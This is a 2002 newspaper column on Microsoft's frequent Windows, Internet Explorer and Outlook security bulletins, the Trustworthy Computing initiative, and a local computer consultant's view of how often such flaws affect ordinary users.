Microsoft tells of even minor security flaws

September 05, 2002

It's almost like a greeting from an old friend. You start up your computer, log on to the Internet, and up pops a little gray box:

"Microsoft Critical Update Notification: New critical updates are available for your computer. Microsoft strongly suggests that you install these updates now."

When you click the "View Updates" button, you're whisked to Microsoft's Web site, where you can download a fix for the latest Windows security flub.

I've seen plenty of these warnings lately. Last week, it was a fix for a critical security flaw that threatened my "Digital Certificates," whatever they are. The week before it was yet another security bug in Internet Explorer that could allow a hacker to take over my computer, and before that, a flaw in Office XP that could allow a script kiddie in Kazakhstan to burn down my house by remote control, or something like that.

All told, Microsoft has issued 48 security bulletins so far this year, and may well break last year's record of 60. That doesn't count security bugs that other people discover and make public before Microsoft gets a chance to announce them.

What's going on here? Are we risking life, liberty and property every time we turn on our computers?

The answer is no. And yes.

There's no question that Microsoft Windows and its primary applications have more holes than a prairie dog village.

This is the legacy of a corporate culture that developed around personal computers in the 1980s, when few PCs were connected to anything. The young Bill Gates and his Microsoft cohorts were hackers of the old school whose mission in life was to make computers do cool things and provide tools for developers and users who wanted to do the same thing. The notion that somebody might use those same tools to create mischief wasn't on anybody's mind.

Fast forward 20 years and we have hundreds of millions of personal computers that are connected - on corporate networks and over the Internet. Unfortunately, those computers run software that was the product of a stand-alone mindset.

Consider Internet Explorer and its companion e-mail programs, Outlook and Outlook Express. A Web browser by definition is a programming tool that allows an intruder to take control of your computer - albeit at your invitation.

In the best of all worlds, a browser should put strict limits on what a Web programmer can do. It certainly shouldn't let the Web page designer steal information, destroy files or plant programs that can take over your computer.

Although it never deliberately let that happen, Microsoft expended far more effort on adding new features and e-commerce tools to IE than it did on building defenses against hackers who might turn those features around for nefarious purposes. Over the past few years, hackers have figured out how to do just that.

Outlook and Outlook Express compound these security flaws when you display e-mail in Web page format. No longer do you have to visit a Web site to execute malicious code. All you have to do is open your mail or browse through it in a preview window. Moreover, because Microsoft has built so many programming "hooks" into Windows, it's relatively easy for virus writers to hijack Outlook to spread their work around the world.

Unfortunately, these are just two of the many security lapses that Microsoft has been hammered for over the past two years. Many others affect the servers that run corporate networks, e-commerce operations and Web sites.

Gates finally owned up to the problem in January, when he sent a rare message to all Microsoft employees announcing a new "Trustworthy Computing" initiative. Henceforth, he declared, the company's top priority would be security and user privacy - new programs and features would come second.

Indeed, Microsoft is cleaning up its act. When it finds a flaw, it generally fixes the problem, announces it to the world and - if the bug is serious enough - invites users to download a fix.

Which raises another question. How serious are these security bugs? They're certainly treated seriously in the press when Microsoft itself calls them "critical."

Since I've never been bitten by one, I called the best professional troubleshooter I know, Marc Seidler, and asked him how often he encounters the problems these fixes are designed to prevent. Seidler, proprietor of a local consulting business known as The Computer Doctors, has operated on thousands of troubled PCs in businesses and homes over the past half-dozen years. He regularly monitors Microsoft's technical Web sites, which he says are excellent.

"I have never seen one of these sort of security issues" in a client's computer, he said.

"Most of these things are discovered in the lab," he added, and many are important mainly to large businesses with sophisticated networks.

"But if you're sitting at home and have Comcast or DSL [Internet service], it's not an issue."

Baltimore Sun Articles
Please note the green-lined linked article text has been applied commercially without any involvement from our newsroom editors, reporters or any other editorial staff.